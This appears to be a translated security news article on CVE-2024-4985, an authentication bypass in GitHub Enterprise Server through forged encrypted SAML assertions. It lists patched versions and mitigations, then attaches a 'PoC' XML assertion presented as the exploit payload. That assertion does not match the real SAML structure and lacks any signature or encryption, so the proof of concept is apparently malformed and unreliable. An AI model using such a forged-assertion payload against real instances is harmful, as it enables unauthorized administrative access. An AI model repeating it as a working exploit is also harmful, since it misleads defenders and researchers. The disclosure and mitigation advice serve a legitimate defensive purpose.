Recently, security researchers disclosed a critical vulnerability (CVE-2024-4985, cvss score: 10.0) in GitHub Enterprise Server (GHES), which allows unauthorized attackers to access GHES instances without pre-authentication. . The vulnerability affects all GHES versions prior to 3.13.0 and is fixed in versions 3.9.15, 3.10.12, 3.11.10 and 3.12.4.
Currently, GitHub has launched fixes and has not found that the vulnerability has been exploited on a large scale. Users can update GHES to a patched version (3.9.15, 3.10.12, 3.11.10, 3.12.4 or higher). If an immediate update is not possible, consider temporarily disabling SAML authentication or cryptographic assertion functionality as a temporary mitigation.
GHES is a self-hosted software development platform that allows organizations to store and build software using Git version control and automate the deployment process.
The vulnerability exploits a flaw in the way GHES handles encrypted SAML assertions. An attacker can create a fake SAML assertion containing correct user information. When GHES processes a fake SAML assertion, it will fail to properly verify its signature, allowing an attacker to access the GHES instance.
Successful exploitation of this vulnerability could allow an unauthorized attacker to gain full administrative control of a GHES instance, enabling them to access all data and perform any action on the system.
GitHub further noted that cryptographic assertions are not enabled by default and that the vulnerability does not affect instances that do not use SAML single sign-on (SSO) or use SAML SSO authentication without cryptographic assertions. Encryption assertions allow website administrators to increase the security of a GHES instance by encrypting messages sent by the SAML identity provider (IdP) during the authentication process.
PoC attached
<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">   <Audience>https://your-ghes-instance.com</Audience>   <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">     <SubjectConfirmationData>       <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>     </SubjectConfirmationData>   </SubjectConfirmation>   <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">     <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>   </AuthnStatement>   <AttributeStatement>     <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>     <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">(email protected)</Attribute>   </AttributeStatement> </Assertion>
Reference Links:
https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server
https://thehackernews.com/2024/05/critical-github-enterprise-server-flaw.html
This article is Independent point of view, no reproduction without permission, please contact FreeBuf customer service XiaoBee for authorization, WeChat: freebee2022
GIPHY App Key not set. Please check settings